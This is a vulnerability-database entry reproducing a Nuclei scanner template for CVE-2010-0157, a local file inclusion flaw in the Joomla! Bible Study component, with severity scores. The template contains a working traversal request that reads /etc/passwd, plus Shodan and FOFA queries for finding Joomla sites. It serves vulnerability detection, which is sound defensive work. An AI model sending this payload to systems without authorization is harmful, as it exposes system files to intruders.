Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-0157
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component com_biblestudy - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
9

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6 Medium

AI Score

Confidence

High

0.234 Low

EPSS

Percentile

96.6%

A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a … (dot dot) in the controller parameter in a studieslist action to index.php.

id: CVE-2010-0157

info:
  name: Joomla! Component com_biblestudy - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/10943
    - https://nvd.nist.gov/vuln/detail/CVE-2010-0157
    - http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-0157
    cwe-id: CWE-22
    epss-score: 0.23423
    epss-percentile: 0.96555
    cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomla
    product: joomla\!
    shodan-query:
      - http.html:"joomla! - open source content management"
      - http.component:"joomla"
      - cpe:"cpe:2.3:a:joomla:joomla\!"
    fofa-query: body="joomla! - open source content management"
  tags: cve2010,cve,joomla,lfi,edb,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c4d28687b4669984fd7a6494440e35f1bdc5540a253c81a50eda9363af82f06c0221008c9916ea5e9328294b16e9ddf26f141418225f0ad0a5dedfc60c672e84e2d2f9:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6 Medium

AI Score

Confidence

High

0.234 Low

EPSS

Percentile

96.6%